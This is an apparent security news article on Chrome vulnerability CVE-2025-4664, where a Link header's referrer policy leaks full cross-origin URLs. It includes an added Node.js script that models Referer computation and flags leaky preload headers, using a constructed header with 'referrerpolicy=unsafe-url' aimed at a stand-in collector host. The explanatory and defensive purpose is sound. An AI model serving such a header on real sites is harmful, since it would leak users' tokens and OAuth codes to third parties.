📰 New Chrome Vulnerability CVE-2025-4664 Allows Cross-Origin Data Leak via Referrer Policy Flaw
🔍 What Happened?
Google has released a security update for Chrome that patches four vulnerabilities, one of which Google says has an exploit in the wild. Tracked as CVE-2025-4664 and rated high severity by Google, the issue stems from insufficient policy enforcement in Chrome's Loader component.
According to Google, versions of Chrome prior to 136.0.7103.113 are vulnerable, allowing remote attackers to potentially leak cross-origin data using a specially crafted HTML page. The CVSS score of 4.3 may seem moderate, but the exploit's presence in the wild and potential to leak sensitive user information significantly raise its risk level.
🧪 How Does CVE-2025-4664 Work?
Security researcher Vsevolod Kokorin (@slonser_) identified and publicly detailed the vulnerability on May 5, 2025, via a series of posts on X (formerly Twitter). He highlighted a core issue in how Chrome handles the Link header in sub-resource requests—a behavior that differs from other major browsers.
The Link header can carry a referrer policy (the referrerpolicy link parameter), and Chrome applies it when processing the header on a sub-resource response, a step other browsers do not take. Under Chrome's default policy, strict-origin-when-cross-origin, a cross-origin request carries only the page's origin in its Referer header. When the Link header sets the policy to unsafe-url, the request it triggers is sent with the page's full URL instead, query string included. A third-party site can therefore receive the full query string of a page on another origin, and query strings routinely hold sensitive values such as session tokens, OAuth authorization codes, or personally identifiable data.
🎯 Why Is This Dangerous?
Kokorin demonstrated that the information can be exfiltrated with nothing more than an image loaded from a third-party domain: when a page whose URL carries a sensitive query string embeds the image, the third party's response can supply a Link header with the crafted referrer policy, and the browser, honoring that policy, sends the page's full URL, query parameters included, to the attacker.
Such a leak can lead to account takeover or other forms of identity theft, especially when the stolen data includes login tokens, OAuth codes, or session identifiers.
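To make the mechanics concrete, here is an added example that is not part of the original article and is not Kokorin's own proof of concept. It models, in plain Node.js, how a browser derives the Referer header for a sub-resource request under each referrer policy (following the Fetch specification's referrer rules), parses a Link header of the shape the article describes, and contrasts Chrome's default policy with unsafe-url. It also includes a small check that flags preload links in a response which would carry more than the page's origin, which is the review a site owner would want to run over its own sub-resource responses. The hostnames (app.example, collector.example), the header value and the secret in the query string are all constructed for this example, and the header shape (a rel=preload link with a referrerpolicy parameter) is an assumption of the example; the script only computes the resulting Referer values, it does not exercise a browser.

```javascript
// Added example (not from the article or from Kokorin's PoC).
// Computes the Referer a browser sends for a request under a given
// referrer policy and parses a Link header such as the one the article
// describes. All hosts, paths and values below are constructed.

// Parse an HTTP Link header (RFC 8288) into [{ target, params }].
// Sufficient for the headers in this example; a target URL containing a
// literal comma would need a full RFC 8288 parser.
function parseLinkHeader(header) {
  const links = [];
  for (const part of header.split(',')) {
    const m = part.trim().match(/^<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const params = {};
    for (const p of m[2].split(';')) {
      const kv = p.trim().match(/^([^=\s]+)\s*=\s*"?([^"]*)"?$/);
      if (kv) params[kv[1].toLowerCase()] = kv[2];
    }
    links.push({ target: m[1], params });
  }
  return links;
}

// Referer value for a request to requestUrl issued from the page at
// documentUrl under `policy`; null means no Referer header is sent.
function computeReferer(documentUrl, requestUrl, policy) {
  const doc = new URL(documentUrl);
  const req = new URL(requestUrl);
  doc.username = ''; doc.password = ''; doc.hash = '';   // always stripped
  const full = doc.href;                                  // path and query survive
  const originOnly = doc.origin + '/';
  const sameOrigin = doc.origin === req.origin;
  const downgrade = doc.protocol === 'https:' && req.protocol === 'http:';
  switch (policy) {
    case 'no-referrer':                return null;
    case 'unsafe-url':                 return full;
    case 'origin':                     return originOnly;
    case 'same-origin':                return sameOrigin ? full : null;
    case 'origin-when-cross-origin':   return sameOrigin ? full : originOnly;
    case 'no-referrer-when-downgrade': return downgrade ? null : full;
    case 'strict-origin':              return downgrade ? null : originOnly;
    default: // 'strict-origin-when-cross-origin', the browser default
      if (sameOrigin) return full;
      return downgrade ? null : originOnly;
  }
}

// For the embedding page's URL and the Link header returned by a
// sub-resource, list the preload requests the header would trigger and
// the Referer each would carry (assumed header shape, see lead-in).
function preloadReferers(documentUrl, linkHeader) {
  return parseLinkHeader(linkHeader)
    .filter(({ params }) => params.rel === 'preload')
    .map(({ target, params }) => {
      const policy = params.referrerpolicy || 'strict-origin-when-cross-origin';
      return { target, policy, referer: computeReferer(documentUrl, target, policy) };
    });
}

// Audit check: preload links in a response whose Referer would expose
// more than the page's origin (path or query string).
function leakyPreloads(responseHeaders, documentUrl) {
  const link = responseHeaders.link || responseHeaders.Link || '';
  const originOnly = new URL(documentUrl).origin + '/';
  return preloadReferers(documentUrl, link)
    .filter((r) => r.referer !== null && r.referer !== originOnly);
}

// Constructed scenario: an OAuth callback page whose URL carries a code,
// loading an image from a third-party host that answers with this header.
const DOCUMENT_URL = 'https://app.example/oauth/callback?code=SECRET-CODE&state=xyz#frag';
const IMAGE_RESPONSE_HEADERS = {
  'content-type': 'image/gif',
  link: '<https://collector.example/pixel.gif>; rel=preload; as=image; referrerpolicy=unsafe-url',
};

for (const policy of ['strict-origin-when-cross-origin', 'unsafe-url']) {
  console.log(policy.padEnd(32), '->',
    computeReferer(DOCUMENT_URL, 'https://collector.example/pixel.gif', policy));
}
console.log(leakyPreloads(IMAGE_RESPONSE_HEADERS, DOCUMENT_URL));
```

Run with `node`: under the default policy the collector sees only `https://app.example/`; under the policy the Link header sets, it sees the full callback URL with the code. The `leakyPreloads` check is the part worth keeping: point it at the headers of any sub-resource your pages load from third parties and it reports the links that would carry a path or query string off-origin.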
🛠️ Who Is Affected?
Users running Google Chrome versions earlier than 136.0.7103.113 are affected. Because other Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi share the same engine, their users may also be vulnerable until the corresponding updates are released and applied.
🔄 What Should You Do?
- Update Chrome immediately to 136.0.7103.113 or later (Google shipped 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux).
- Apply updates to other Chromium-based browsers as they become available.
- Avoid clicking on suspicious links or visiting untrusted websites, especially if they contain embedded images or media from third-party sources.
- Developers and website administrators should review where their applications rely on query parameters and keep secrets such as session tokens, OAuth authorization codes, and password-reset tokens out of URLs; a URL can be exposed through the Referer header, browser history, and server logs, and a bug like this one turns that exposure into a cross-origin leak.
📢 Update from CISA
On May 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-4664 to its Known Exploited Vulnerabilities (KEV) catalog. CISA has mandated federal agencies to patch affected systems no later than June 5, 2025.
❓ Frequently Asked Questions (FAQs)
❓ What is CVE-2025-4664?
CVE-2025-4664 is a vulnerability in Chrome's Loader component that allows attackers to leak cross-origin data using a crafted referrer-policy in an HTML page.
❓ Why is it considered high severity?
Even though its CVSS score is 4.3, it has been exploited in the wild, and it could leak sensitive data like tokens or user credentials, potentially leading to full account takeovers.
❓ Which browsers are at risk?
Any browser based on Chromium—including Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi—is potentially at risk if it's not updated to the latest version.
❓ How can users protect themselves?
By updating their browser immediately, avoiding untrusted sites, and ensuring sensitive data isn't exposed via URL query parameters.
❓ Has this been used in real attacks?
Google's advisory states that it "is aware that an exploit for CVE-2025-4664 exists in the wild", and CISA's KEV listing reflects that assessment. Neither has published details of the attacks, so the only public material is Kokorin's proof-of-concept demonstrations.
🧾 Conclusion
The discovery of CVE-2025-4664 highlights the persistent and evolving nature of web-based threats. Despite its relatively low CVSS score, the fact that this vulnerability can leak cross-origin data through something as seemingly innocuous as an image tag makes it a significant security concern.
All users—whether casual Chrome users or enterprise administrators—should act quickly to update affected browsers and remain vigilant. In the modern digital world, even small oversights in policy enforcement can lead to major breaches of privacy and security.
Stay safe. Stay updated.